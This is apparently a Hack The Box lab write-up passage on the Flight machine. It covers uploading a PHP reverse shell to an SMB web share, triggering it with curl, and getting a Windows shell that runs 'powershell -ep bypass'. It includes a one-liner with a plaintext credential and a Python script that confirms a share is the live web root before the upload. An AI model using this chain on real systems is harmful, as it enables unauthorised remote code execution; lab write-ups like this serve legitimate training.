File Upload / RCE


┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ KRB5CCNAME=c.bum@g0.flight.htb.ccache impacket-smbclient flight.htb/@g0.flight.htb -no-pass -k -target-ip $IP -dc-ip $IP      
Impacket v0.11.0 - Copyright 2023 Fortra
 
Type help for list of commands
# use Web
# cd school.flight.htb
# put shell.php

Uploading the payload containing a PHP reverse shell

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ curl -s http://school.flight.htb/shell.php

Invoking the payload via curl

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.187] 51322
socket: Shell has connected! PID: 1388
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs\school.flight.htb> whoami
flight\svc_apache
 
C:\xampp\htdocs\school.flight.htb> hostname
g0
 
C:\xampp\htdocs\school.flight.htb> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::23d
   IPv6 Address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
   Link-local IPv6 Address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
   IPv4 Address. . . . . . . . . . . : 10.10.11.187
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
                                       10.10.10.2
 
C:\xampp\htdocs\school.flight.htb>powershell -ep bypass
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\xampp\htdocs\school.flight.htb> 

Initial foothold established on the target as svc_apache, which runs in the security context of a service account rather than an interactive user, via the file-upload-to-RCE chain: the Web share is the XAMPP document root, so any PHP dropped into school.flight.htb is executed by Apache as soon as it is requested.

$ smbclient //g0.flight.htb/web -U 'flight.htb\c.bum%tikkycoll_431012284' -c 'prompt false ; cd school.flight.htb ; put shell.php' ; curl -s http://school.flight.htb/shell.php

One-liner: a scheduled task running in the background keeps resetting the connection, so the upload and the curl that triggers the payload have to be issued together, with the listener already up.
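Before dropping a reverse shell into a share it is worth confirming that the share really is the served web root and that the background cleanup has not already removed the file: upload a random marker, fetch it over HTTP, compare, delete. The script below is an added example, not part of the original write-up or of any tool it uses. The share path //g0.flight.htb/Web, the subdirectory school.flight.htb, the marker name probe.txt and the SMB_PASS environment variable are assumptions for illustration; the transport callables are injected so the comparison logic runs offline against in-memory fakes, while the smbclient and urllib adapters are what you would wire in against a live target.

```python
"""Added example: confirm that an SMB share is the live web root by uploading a
unique marker, fetching it back over HTTP and cleaning up afterwards.

upload / fetch / delete are injected callables so the core check can be
exercised offline; the adapters at the bottom are the real-world ones.
"""
import os
import secrets
import subprocess
import tempfile
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Tuple

Upload = Callable[[str, bytes], None]       # (remote_name, data) -> None
Fetch = Callable[[str], Tuple[int, bytes]]  # remote_name -> (http status, body)
Delete = Callable[[str], bool]              # remote_name -> removed?


@dataclass
class ProbeResult:
    served: bool   # the marker came back byte-for-byte over HTTP
    status: int    # HTTP status observed (0 if the request failed outright)
    cleaned: bool  # the marker was removed from the share afterwards


def probe_webroot(upload: Upload, fetch: Fetch, delete: Delete,
                  remote_name: str = "probe.txt") -> ProbeResult:
    """Upload a random token, fetch it over HTTP, then delete it.

    served=True means the URL returned exactly the bytes written to the
    share, so the share maps onto the web root.  A 200 with a different body
    (an index page, a default vhost) is NOT a match, and a 404 usually means
    a background cleanup removed the file first or the share is not served.
    """
    token = secrets.token_hex(16).encode()   # unpredictable, cannot collide with real content
    upload(remote_name, token)
    try:
        status, body = fetch(remote_name)
    except Exception:                        # connection refused, timeout, DNS failure ...
        status, body = 0, b""
    cleaned = delete(remote_name)            # always clean up, even when the fetch failed
    return ProbeResult(served=(body.strip() == token), status=status, cleaned=cleaned)


# --- real adapters (assumed target details; replace with your own) ---------

def smbclient_adapters(unc: str, user: str, password: str, subdir: str = "."):
    """Build upload/delete callables on top of the smbclient CLI.

    unc     e.g. //g0.flight.htb/Web   (assumed share from the enumeration step)
    user    e.g. flight.htb\\c.bum
    subdir  directory inside the share that is served, e.g. school.flight.htb
    """
    def run(script: str) -> subprocess.CompletedProcess:
        return subprocess.run(
            ["smbclient", unc, "-U", f"{user}%{password}", "-c", script],
            capture_output=True, text=True, check=False)

    def upload(remote_name: str, data: bytes) -> None:
        with tempfile.NamedTemporaryFile(delete=False) as tmp:   # smbclient put needs a local file
            tmp.write(data)
            local = tmp.name
        try:
            run(f"cd {subdir}; put {local} {remote_name}")
        finally:
            os.unlink(local)

    def delete(remote_name: str) -> bool:
        proc = run(f"cd {subdir}; del {remote_name}")
        return proc.returncode == 0 and "NT_STATUS" not in (proc.stdout + proc.stderr)

    return upload, delete


def http_fetch(base_url: str, timeout: float = 10.0) -> Fetch:
    """Fetch base_url/<name>; HTTP error codes become the status, body empty."""
    def fetch(remote_name: str) -> Tuple[int, bytes]:
        req = urllib.request.Request(f"{base_url.rstrip('/')}/{remote_name}")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, b""
    return fetch


if __name__ == "__main__":
    # Assumed target details; the password is read from SMB_PASS rather than hard-coded.
    up, rm = smbclient_adapters("//g0.flight.htb/Web", "flight.htb\\c.bum",
                                os.environ.get("SMB_PASS", ""), subdir="school.flight.htb")
    print(probe_webroot(up, http_fetch("http://school.flight.htb"), rm))
```

Run it once before uploading shell.php: `served=True` tells you the share is the document root and the file survived long enough to be fetched, which is exactly the window the one-liner above has to fit into; a 404 with `cleaned=False` means the cleanup task beat you to it and the upload and trigger need to be tighter still.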